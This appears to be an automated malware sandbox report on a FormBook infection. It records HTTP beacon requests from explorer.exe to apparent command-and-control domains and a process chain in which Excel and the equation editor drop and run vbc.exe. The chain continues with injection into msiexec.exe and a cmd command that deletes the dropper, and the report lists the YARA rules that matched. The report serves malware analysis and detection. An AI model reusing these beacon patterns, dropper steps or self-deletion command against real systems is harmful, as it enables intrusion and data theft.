                                                                                                                                                                Jan 27, 2021 07:21:40.943027973 CET798OUTGET /oean/?jvylC6k0=Opa2yxOMW+p6bOslAOO6h/1EkNB54ngFJAZHYsyvYxpw4UyGhwhjUO3aSMs8Sdr4Amozmg==&gnj80=CJBh7xO8zrtpcTq HTTP/1.1
                                                                                                                                                                Host: www.kerifletcherrock.com
                                                                                                                                                                Connection: close
                                                                                                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                Data Ascii:
                                                                                                                                                                Jan 27, 2021 07:21:41.083858013 CET799INHTTP/1.1 403 Forbidden
                                                                                                                                                                Server: openresty
                                                                                                                                                                Date: Wed, 27 Jan 2021 06:21:41 GMT
                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                Content-Length: 275
                                                                                                                                                                ETag: "600b4d16-113"
                                                                                                                                                                Via: 1.1 google
                                                                                                                                                                Connection: close
                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                4192.168.2.2249169184.72.229.17680C:\Windows\explorer.exe
                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                Jan 27, 2021 07:21:46.294192076 CET799OUTGET /oean/?gnj80=CJBh7xO8zrtpcTq&jvylC6k0=uJMS4n8m6ACsgyOWGpEiAtJtgQ+Goi3J4PdJxqA1a4iBE1ZCLNY3VJZ0KQbftK8zLMWD1g== HTTP/1.1
                                                                                                                                                                Host: www.rentapalla.com
                                                                                                                                                                Connection: close
                                                                                                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                Data Ascii:
                                                                                                                                                                Jan 27, 2021 07:21:46.428199053 CET800INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                Date: Wed, 27 Jan 2021 06:21:46 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                X-Hstore: hstore16
                                                                                                                                                                X-Hrouter: hrouter4
                                                                                                                                                                Location: http://www.rentapalla.com/oean.php?gnj80=CJBh7xO8zrtpcTq&jvylC6k0=uJMS4n8m6ACsgyOWGpEiAtJtgQ+Goi3J4PdJxqA1a4iBE1ZCLNY3VJZ0KQbftK8zLMWD1g==
                                                                                                                                                                Age: 0
                                                                                                                                                                X-Cache: MISS
                                                                                                                                                                X-Cache-Hits: 0
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Connection: close


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                5192.168.2.2249170103.24.200.16880C:\Windows\explorer.exe
                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                Jan 27, 2021 07:21:52.073287010 CET801OUTGET /oean/?jvylC6k0=0eja1hG/9tz86IL7VglQafiQyvHA2C4h7eUbaFgtY0eGgr750jLj1uDPdaibWffUDCzVWQ==&gnj80=CJBh7xO8zrtpcTq HTTP/1.1
                                                                                                                                                                Host: www.doxinlabs.com
                                                                                                                                                                Connection: close
                                                                                                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                Data Ascii:
                                                                                                                                                                Jan 27, 2021 07:21:52.253814936 CET801INHTTP/1.1 404 Not Found
                                                                                                                                                                Date: Wed, 27 Jan 2021 06:21:52 GMT
                                                                                                                                                                Server: Apache
                                                                                                                                                                Content-Length: 315
                                                                                                                                                                Connection: close
                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                Code Manipulations

                                                                                                                                                                Statistics

                                                                                                                                                                Behavior

                                                                                                                                                                Click to jump to process

                                                                                                                                                                System Behavior

                                                                                                                                                                General

                                                                                                                                                                Start time:07:19:53
                                                                                                                                                                Start date:27/01/2021
                                                                                                                                                                Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                                                                                                                                Imagebase:0x13ffc0000
                                                                                                                                                                File size:27641504 bytes
                                                                                                                                                                MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high

                                                                                                                                                                General

                                                                                                                                                                Start time:07:20:12
                                                                                                                                                                Start date:27/01/2021
                                                                                                                                                                Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                File size:543304 bytes
                                                                                                                                                                MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high

                                                                                                                                                                General

                                                                                                                                                                Start time:07:20:16
                                                                                                                                                                Start date:27/01/2021
                                                                                                                                                                Path:C:\Users\Public\vbc.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:'C:\Users\Public\vbc.exe'
                                                                                                                                                                Imagebase:0x1300000
                                                                                                                                                                File size:753664 bytes
                                                                                                                                                                MD5 hash:3ED71F97489274760B6CF02192304259
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:.Net C# or VB.NET
                                                                                                                                                                Yara matches:
                                                                                                                                                                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.2168164981.00000000027C1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2168902799.00000000037C9000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2168902799.00000000037C9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2168902799.00000000037C9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                Antivirus matches:
                                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                Reputation:low

                                                                                                                                                                General

                                                                                                                                                                Start time:07:20:17
                                                                                                                                                                Start date:27/01/2021
                                                                                                                                                                Path:C:\Users\Public\vbc.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:C:\Users\Public\vbc.exe
                                                                                                                                                                Imagebase:0x1300000
                                                                                                                                                                File size:753664 bytes
                                                                                                                                                                MD5 hash:3ED71F97489274760B6CF02192304259
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Yara matches:
                                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2222809957.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2222809957.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2222809957.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2222743183.0000000000220000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2222743183.0000000000220000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2222743183.0000000000220000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2222674041.0000000000130000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2222674041.0000000000130000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2222674041.0000000000130000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                Reputation:low

                                                                                                                                                                General

                                                                                                                                                                Start time:07:20:19
                                                                                                                                                                Start date:27/01/2021
                                                                                                                                                                Path:C:\Windows\explorer.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:
                                                                                                                                                                Imagebase:0xffca0000
                                                                                                                                                                File size:3229696 bytes
                                                                                                                                                                MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high

                                                                                                                                                                General

                                                                                                                                                                Start time:07:20:43
                                                                                                                                                                Start date:27/01/2021
                                                                                                                                                                Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                Imagebase:0x5f0000
                                                                                                                                                                File size:73216 bytes
                                                                                                                                                                MD5 hash:4315D6ECAE85024A0567DF2CB253B7B0
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Yara matches:
                                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2379572834.0000000000090000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2379572834.0000000000090000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2379572834.0000000000090000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2379681333.00000000001C0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2379681333.00000000001C0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2379681333.00000000001C0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2379729780.00000000002B0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2379729780.00000000002B0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2379729780.00000000002B0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                Reputation:moderate

                                                                                                                                                                General

                                                                                                                                                                Start time:07:20:45
                                                                                                                                                                Start date:27/01/2021
                                                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:/c del 'C:\Users\Public\vbc.exe'
                                                                                                                                                                Imagebase:0x4a530000
                                                                                                                                                                File size:302592 bytes
                                                                                                                                                                MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high

                                                                                                                                                                Disassembly

                                                                                                                                                                Code Analysis

                                                                                                                                                                Reset < >